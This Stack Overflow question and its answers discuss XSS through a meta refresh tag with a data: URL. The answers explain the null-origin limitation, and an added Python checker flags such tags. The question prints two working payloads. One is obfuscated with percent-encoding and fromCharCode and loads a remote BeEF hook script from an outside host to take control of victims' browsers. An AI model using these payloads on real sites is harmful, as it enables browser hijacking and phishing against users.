Question
Some professional pentester guy told me this XSS test vector is useless for pentesting. And the payload looks like this:
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
But when I save the code to an HTML file with more powerful JavaScript like hook.js (from the BeEF exploit framework):
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%36%30%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%33%32%2C%31%31%35%2C%31%31%34%2C%39%39%2C%36%31%2C%31%30%34%2C%31%31%36%2C%31%31%36%2C%31%31%32%2C%35%38%2C%34%37%2C%34%37%2C%31%31%32%2C%31%30%38%2C%31%30%31%2C%39%38%2C%31%31%35%2C%34%36%2C%31%30%39%2C%31%30%31%2C%34%37%2C%34%38%2C%34%36%2C%31%30%36%2C%31%31%35%2C%36%32%2C%36%30%2C%34%37%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%36%32%29%29%3C%2F%73%63%72%69%70%74%3E">
it works perfectly on Firefox and Chrome. I can see the victim online in my BeEF exploit framework and a lot of functions are available.
I don't really get it. What's wrong with this payload? I have asked this question several times but there is no response from him. It makes me very confused. Can anybody tell me why he said this one is useless for pentesting?
Answer 1:
XSS through a meta tag is highly dependent on the browser used by the target victim. A meta tag such as <meta http-equiv="refresh" content="0;url=javascript:alert(1)"> will fire malicious javascript on the hosting domain, but will only work in Safari; all other browsers refuse to follow a location: javascript: header.
When using a data URI in the tag, the browser will load the decoded payload into a null domain and any JavaScript will be fired in the context of a null domain. While this can still be used to fire redirects, XHR, and other such attacks, it is useless for accessing anything on the hosting domain. This attack will also not work in IE since it only allows data URIs for image type elements, and I think that is even restricted to style/CSS.
Though meta tag injections are only successful for XSS in very limited capacity, they are still very dangerous in other attacks and are worth testing.
Answer 2:
As far as I remember, data: URIs are loaded as a separate origin, so you cannot access the vulnerable site from the injected script. However, this could be used to deliver an exploit or for phishing, so I wouldn't call it totally useless.
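As an added example (not code from the question or either answer), here is a small Python checker that flags meta refresh tags whose target is a javascript: or data: URL, percent-decodes the data: body, unwraps String.fromCharCode(...) strings like the one in the question's second payload, and labels which origin the script would run in, following Answer 1. The sample HTML is constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample page (assumption: not the original question's payload).
# Tag 1 is a benign redirect, 2-3 are injections, 4 hides markup in fromCharCode.
SAMPLE_HTML = """
<meta http-equiv="refresh" content="5; url=https://example.com/login">
<meta http-equiv="refresh" content="0; url=data:text/html,%3Cscript%3Ealert(1)%3C/script%3E">
<META HTTP-EQUIV=refresh CONTENT="0;URL=javascript:alert(document.domain)">
<meta http-equiv="refresh" content="0; url=data:text/html,%3Cscript%3Edocument.write(String.fromCharCode(60,98,62,104,105,60,47,98,62))%3C/script%3E">
"""

TAG_RE = re.compile(r'<meta\b([^>]*)>', re.IGNORECASE)
ATTR_RE = re.compile(r'([\w-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s"\'>]+))')
FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(([\d,\s]+)\)')

def _attrs(raw):
    """Parse the attribute string of one tag into a lowercase-keyed dict."""
    return {name.lower(): dq or sq or bare for name, dq, sq, bare in ATTR_RE.findall(raw)}

def _refresh_target(content):
    """Extract the URL from a refresh content value like '0; url=<target>'."""
    target = content.split(';', 1)[1].strip() if ';' in content else ''
    return target[4:].strip() if target[:4].lower() == 'url=' else target

def find_meta_refresh_findings(html):
    """Report each meta refresh whose target is a javascript: or data: URL."""
    findings = []
    for raw in TAG_RE.findall(html):
        attrs = _attrs(raw)
        if attrs.get('http-equiv', '').lower() != 'refresh':
            continue
        target = _refresh_target(attrs.get('content', ''))
        scheme = target.split(':', 1)[0].strip().lower()
        if scheme == 'javascript':
            # Would execute in the hosting document's origin where a browser honours it
            findings.append({'scheme': 'javascript', 'origin': 'hosting document',
                             'decoded': target, 'hidden': []})
        elif scheme == 'data':
            # Loads as an opaque (null) origin: no access to the host page's DOM/cookies
            decoded = unquote(target.split(',', 1)[1]) if ',' in target else ''
            hidden = [''.join(chr(int(n)) for n in m.group(1).split(','))
                      for m in FROMCHARCODE_RE.finditer(decoded)]
            findings.append({'scheme': 'data', 'origin': 'opaque (null) origin',
                             'decoded': decoded, 'hidden': hidden})
    return findings
```

Run `find_meta_refresh_findings(SAMPLE_HTML)` to get three findings; the benign https redirect produces none.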
Source: https://stackoverflow.com/questions/18947139/xss-in-meta-tag